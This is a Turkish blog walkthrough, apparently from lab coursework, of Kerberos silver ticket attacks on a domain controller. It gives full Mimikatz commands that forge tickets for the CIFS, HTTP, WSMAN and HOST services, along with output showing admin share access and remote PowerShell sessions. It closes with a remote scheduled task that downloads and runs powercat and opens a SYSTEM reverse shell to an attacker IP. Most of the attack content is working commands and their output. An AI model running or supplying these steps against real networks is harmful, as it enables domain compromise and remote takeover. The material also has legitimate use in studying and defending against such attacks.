Bu yazıyı Pentester Academy'nin kurslarına başladığımda yazmıştım. Bazı yanlışlar yaptığımı görerek şimdi tekrardan kaleme almaya karar verdim. Yazı içerisinde belirli koşullar dahilinde bir silver ticket saldırısı gerçekleştireceğiz.
Bağlantı kurduğumuz makina üzerinde local priv yapmışız ve hedef servisin ntlm hash'inin elimizde olması gerekmektedir. Silver ticket yapmadan önce Kerberoast gibi saldırılarla şifreler elde edilebilir.
Servislere göre farklı silver ticket atakları yapabiliriz. Aşağıda bazı servis tiplerinin örnekleri gösterilmiştir.
Servis Tipi: WMI
Service Silver Tickets: HOST, RPCSSServis Tipi: PowerShell Remoting
Service Silver Tickets: HOST, HTTP, WSMAN, RPCSSServis Tipi: WinRM
Service Silver Tickets: HOST, HTTPServis Tipi: Scheduled Tasks
Service Silver Tickets: HOSTServis Tipi: Windows File Share (CIFS)
Service Silver Tickets: CIFSServis Tipi: LDAP operations including Mimikatz DCSync
Service Silver Tickets: LDAPServis Tipi: Windows Remote Server Administration Tools
Service Silver Tickets: RPCSS, LDAP, CIFS
Yukarıdaki kısımı inceldiyseniz anlamanız gereken kısaca şudur. Silver ticker saldırısı yaptıktan sonra DC üzerinde powershell remoting yapmak istiyorsanız kullanmanız gerek servis HTTP'dir. HTTP servisinin kullanıcısıda makina olduğundan dolayı NTLM hash olarak makina hesabının NTLM hash'ini kullanmanız gerekcektir. Hedef sunucuda MSSQL Server olabilir, böyle bir durumda da MSSQL hesabının NTLM hash'ini kullanmanız gerekektir. Aşağıda farklı servislerle denenmiş silver ticket saldırılarının önrekleri yer almaktadır.
Silver Ticket for Windows Share (CIFS) Admin Access
Aşağıda görüldüğü üzere saldırı öncesi ilk olarak bir deneme işlemi yapılmıştır ve hata ile karşılaşılmıştır.
PS C:\Tools\MimikatzPowershell> ls \\DC-01.kuday.local\C$
ls : Access is denied
At line:1 char:1
+ ls \\DC-01.kuday.local\C$
+ ~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (\\DC-01.kuday.local\C$:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
ls : Cannot find path '\\DC-01.kuday.local\C$' because it does not exist.
At line:1 char:1
+ ls \\DC-01.kuday.local\C$
+ ~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (\\DC-01.kuday.local\C$:String) [Get-ChildItem], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand
PS C:\Tools\MimikatzPowershell>Mimikatz ile saldırımızı yapalım.
Not: Domain SID'si (Get-DomainSID - Powersploit/Recon) ve DC-01 makinesinin NTLM hashini biliyoruz.
PS C:\Tools\MimikatzPowershell> Invoke-Mimikatz -Command '"kerberos::golden /sid:S-1-5-21-2945184338-1184837640-344998139 /domain:kuday.local /user:Administrator /service:cifs /rc4:35df48bccf39f0ff7e97a928b1d2dc2c /target:DC-01.kuday.local /ptt"'
.#####. mimikatz 2.2.0 (x64) #18362 Oct 30 2019 13:01:25
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(powershell) # kerberos::golden /sid:S-1-5-21-2945184338-1184837640-344998139 /domain:kuday.local /user:Administrator /service:cifs /rc4:35df48bccf39f0ff7e97a928b1d2dc2c /target:DC-01.kuday.local /ptt
User : Administrator
Domain : kuday.local (KUDAY)
SID : S-1-5-21-2945184338-1184837640-344998139
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 35df48bccf39f0ff7e97a928b1d2dc2c - rc4_hmac_nt
Service : cifs
Target : DC-01.kuday.local
Lifetime : 11/29/2020 2:35:26 AM ; 11/27/2030 2:35:26 AM ; 11/27/2030 2:35:26 AM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'Administrator @ kuday.local' successfully submitted for current session
PS C:\Tools\MimikatzPowershell>
PS C:\Tools\MimikatzPowershell>
PS C:\Tools\MimikatzPowershell>
PS C:\Tools\MimikatzPowershell>
PS C:\Tools\MimikatzPowershell> ls \\DC-01.kuday.local\C$
Directory: \\DC-01.kuday.local\C$
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 8/7/2020 6:58 AM PerfLogs
d-r--- 11/10/2020 12:09 AM Program Files
d----- 11/9/2020 12:40 AM Program Files (x86)
d----- 10/29/2020 2:31 AM SQL2019
d-r--- 10/29/2020 5:37 PM Users
d----- 10/6/2020 9:28 PM Windows
-a---- 10/29/2020 5:17 PM 23 Sonuclar.txt
-a---- 11/22/2020 12:29 AM 1391 ticket.kirbi
PS C:\Tools\MimikatzPowershell>Görüldüğü üzere saldırı başarılı!
Silver Ticket to Connect to PowerShell Remoting on Windows Computer with Admin Access
İlk olarak bir deneme yapalım.
PS C:\Windows\system32> Enter-PSSession -ComputerName DC-01.kuday.local
Enter-PSSession : Connecting to remote server DC-01.kuday.local failed with the following error message : A specified
logon session does not exist. It may already have been terminated. For more information, see the
about_Remote_Troubleshooting Help topic.
At line:1 char:1
+ Enter-PSSession -ComputerName DC-01.kuday.local
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidArgument: (DC-01.kuday.local:String) [Enter-PSSession], PSRemotingTransportExcept
ion
+ FullyQualifiedErrorId : CreateRemoteRunspaceFailedYukarıda görüldüğü üzere işlemi gerçekleştiremedik. Şimdi Powershell Remoting için winrm ve http servislerini kullanarak silver ticket saldırısı yapalım.
PS C:\Tools\MimikatzPowershell> Invoke-Mimikatz -Command '"kerberos::golden /sid:S-1-5-21-2945184338-1184837640-344998139 /domain:kuday.local /user:Administrator /service:http /rc4:35df48bccf39f0ff7e97a928b1d2dc2c /target:DC-01.kuday.local /ptt"'
.#####. mimikatz 2.2.0 (x64) #18362 Oct 30 2019 13:01:25
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(powershell) # kerberos::golden /sid:S-1-5-21-2945184338-1184837640-344998139 /domain:kuday.local /user:Administrator /service:http /rc4:35df48bccf39f0ff7e97a928b1d2dc2c /target:DC-01.kuday.local /ptt
User : Administrator
Domain : kuday.local (KUDAY)
SID : S-1-5-21-2945184338-1184837640-344998139
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 35df48bccf39f0ff7e97a928b1d2dc2c - rc4_hmac_nt
Service : http
Target : DC-01.kuday.local
Lifetime : 11/29/2020 2:39:46 AM ; 11/27/2030 2:39:46 AM ; 11/27/2030 2:39:46 AM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'Administrator @ kuday.local' successfully submitted for current session
PS C:\Tools\MimikatzPowershell>PS C:\Tools\MimikatzPowershell> Invoke-Mimikatz -Command '"kerberos::golden /sid:S-1-5-21-2945184338-1184837640-344998139 /domain:kuday.local /user:Administrator /service:wsman /rc4:35df48bccf39f0ff7e97a928b1d2dc2c /target:DC-01.kuday.local /ptt"'
.#####. mimikatz 2.2.0 (x64) #18362 Oct 30 2019 13:01:25
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(powershell) # kerberos::golden /sid:S-1-5-21-2945184338-1184837640-344998139 /domain:kuday.local /user:Administrator /service:wsman /rc4:35df48bccf39f0ff7e97a928b1d2dc2c /target:DC-01.kuday.local /ptt
User : Administrator
Domain : kuday.local (KUDAY)
SID : S-1-5-21-2945184338-1184837640-344998139
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 35df48bccf39f0ff7e97a928b1d2dc2c - rc4_hmac_nt
Service : wsman
Target : DC-01.kuday.local
Lifetime : 11/29/2020 2:40:17 AM ; 11/27/2030 2:40:17 AM ; 11/27/2030 2:40:17 AM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'Administrator @ kuday.local' successfully submitted for current session
PS C:\Tools\MimikatzPowershell>Kontrollerimizi yapalım.
PS C:\Tools\MimikatzPowershell> klist
Current LogonId is 0:0x36705
Cached Tickets: (2)
#0> Client: Administrator @ kuday.local
Server: wsman/DC-01.kuday.local @ kuday.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 11/29/2020 2:40:17 (local)
End Time: 11/27/2030 2:40:17 (local)
Renew Time: 11/27/2030 2:40:17 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0
Kdc Called:
#1> Client: Administrator @ kuday.local
Server: http/DC-01.kuday.local @ kuday.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 11/29/2020 2:39:46 (local)
End Time: 11/27/2030 2:39:46 (local)
Renew Time: 11/27/2030 2:39:46 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0
Kdc Called:
PS C:\Tools\MimikatzPowershell>Harika! Artık bağlantı kurabiliriz.
PS C:\Tools\MimikatzPowershell> Enter-PSSession -ComputerName DC-01.KUDAY.LOCAL
[DC-01.KUDAY.LOCAL]: PS C:\Users\Administrator\Documents> hostname
DC-01
[DC-01.KUDAY.LOCAL]: PS C:\Users\Administrator\Documents>Silver Ticket for the Windows computer (HOST) with Admin Access
Bu son örnek içerisinde de zamanlanmış görev oluşturup bunun aracılığı ile reverse shell almayı deneyeceğiz. Bunun uygulaması diğerlerine nazaran biraz daha uzun sürecek ama bence daha zevkli. Bir kahve alın!
Reverse shell alacağımız için bir dinleme noktasına da ihtiyaç duyuyoruz. Bunun için powercar'i kullancağım. Github linki buradadır.
İlk olarak kendi makinamda bir dinleme noktası oluşturdum.
PS C:\Tools\powercat> Import-Module .\powercat.ps1
PS C:\Tools\powercat> powercat -l -p 443Daha sonrasıda HOST servisini kullanarak bir silver ticket saldırısı gerçekleştirdim.
PS C:\Tools\MimikatzPowershell> Invoke-Mimikatz -Command '"kerberos::golden /sid:S-1-5-21-2945184338-1184837640-344998139 /domain:kuday.local /user:Administrator /service:HOST /rc4:35df48bccf39f0ff7e97a928b1d2dc2c /target:DC-01.kuday.local /ptt"'
.#####. mimikatz 2.2.0 (x64) #18362 Oct 30 2019 13:01:25
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(powershell) # kerberos::golden /sid:S-1-5-21-2945184338-1184837640-344998139 /domain:kuday.local /user:Administrator /service:HOST /rc4:35df48bccf39f0ff7e97a928b1d2dc2c /target:DC-01.kuday.local /ptt
User : Administrator
Domain : kuday.local (KUDAY)
SID : S-1-5-21-2945184338-1184837640-344998139
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 35df48bccf39f0ff7e97a928b1d2dc2c - rc4_hmac_nt
Service : HOST
Target : DC-01.kuday.local
Lifetime : 11/29/2020 3:12:15 AM ; 11/27/2030 3:12:15 AM ; 11/27/2030 3:12:15 AM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'Administrator @ kuday.local' successfully submitted for current session
PS C:\Tools\MimikatzPowershell>Şimdi DC-01'daki zamanlanmış görevleri görelim.
PS C:\Tools\MimikatzPowershell> Get-ScheduledTask -CimSession DC-01.kuday.local
TaskPath TaskName State PSComputerName
-------- -------- ----- --------------
\ CreateExplorerShellUnelevatedTask Ready DC-01.kuday.local
\ STCheck Ready DC-01.kuday.local
\ User_Feed_Synchronization-{EF7... Ready DC-01.kuday.local
\Microsoft\Windows\ Server Initial Configuration Task Disabled DC-01.kuday.local
\Microsoft\Windows\.NET Framework\ .NET Framework NGEN v4.0.30319 Ready DC-01.kuday.local
\Microsoft\Windows\.NET Framework\ .NET Framework NGEN v4.0.30319 64 Ready DC-01.kuday.local
\Microsoft\Windows\.NET Framework\ .NET Framework NGEN v4.0.30319... Disabled DC-01.kuday.local
\Microsoft\Windows\.NET Framework\ .NET Framework NGEN v4.0.30319... Disabled DC-01.kuday.local
\Microsoft\Windows\Active Directory Rights ... AD RMS Rights Policy Template ... Disabled DC-01.kuday.local
\Microsoft\Windows\Active Directory Rights ... AD RMS Rights Policy Template ... Ready DC-01.kuday.local
\Microsoft\Windows\AppID\ EDP Policy Manager Ready DC-01.kuday.local
\Microsoft\Windows\AppID\ PolicyConverter Disabled DC-01.kuday.local
\Microsoft\Windows\AppID\ VerifiedPublisherCertStoreCheck Disabled DC-01.kuday.local
\Microsoft\Windows\Application Experience\ Microsoft Compatibility Appraiser Ready DC-01.kuday.local
\Microsoft\Windows\Application Experience\ ProgramDataUpdater Ready DC-01.kuday.local
...
...
...Normal şartlar altında bu komutu çalıştıramazdık. Silver ticket saldırısı sayesinde CimSession'a DC-01.kuday.local dediğimizde bir hata ile karşılaşmıyoruz. Evet şimdi zamanlanmış görevimizi hazırlayalım.
PS C:\Tools\MimikatzPowershell> schtasks.exe /create /S DC-01.kuday.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "KUDAY4REVERSE" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString('''https://raw.githubusercontent.com/kudayDOTsite/powercat/master/powercat.ps1'''); powercat -c 10.10.250.111 443 -e cmd;'"
SUCCESS: The scheduled task "KUDAY4REVERSE" has successfully been created.
PS C:\Tools\MimikatzPowershell>
PS C:\Tools\MimikatzPowershell>
PS C:\Tools\MimikatzPowershell> schtasks.exe /Run /S DC-01.kuday.local /TN "KUDAY4REVERSE"
SUCCESS: Attempted to run the scheduled task "KUDAY4REVERSE".
PS C:\Tools\MimikatzPowershell>Dinleme noktamızı kontrol ettiğimizde ise:
PS C:\Tools\powercat> powercat -l -p 443 -t 99999
Microsoft Windows [Version 10.0.17763.1397]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>hostname
hostname
DC-01
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>Referanslar:
https://docs.microsoft.com/en-us/powershell/module/scheduledtasks/start-scheduledtask?view=win10-ps
https://docs.microsoft.com/en-us/powershell/module/scheduledtasks/new-scheduledtask?view=win10-ps
https://docs.microsoft.com/en-us/powershell/module/scheduledtasks/register-scheduledtask?view=win10-ps
https://docs.microsoft.com/en-us/powershell/module/scheduledtasks/enable-scheduledtask?view=win10-ps
https://adsecurity.org/?p=2011
https://stackoverflow.com/questions/20108886/scheduled-task-with-daily-trigger-and-repetition-interval
İlk Yorumu Siz Yapın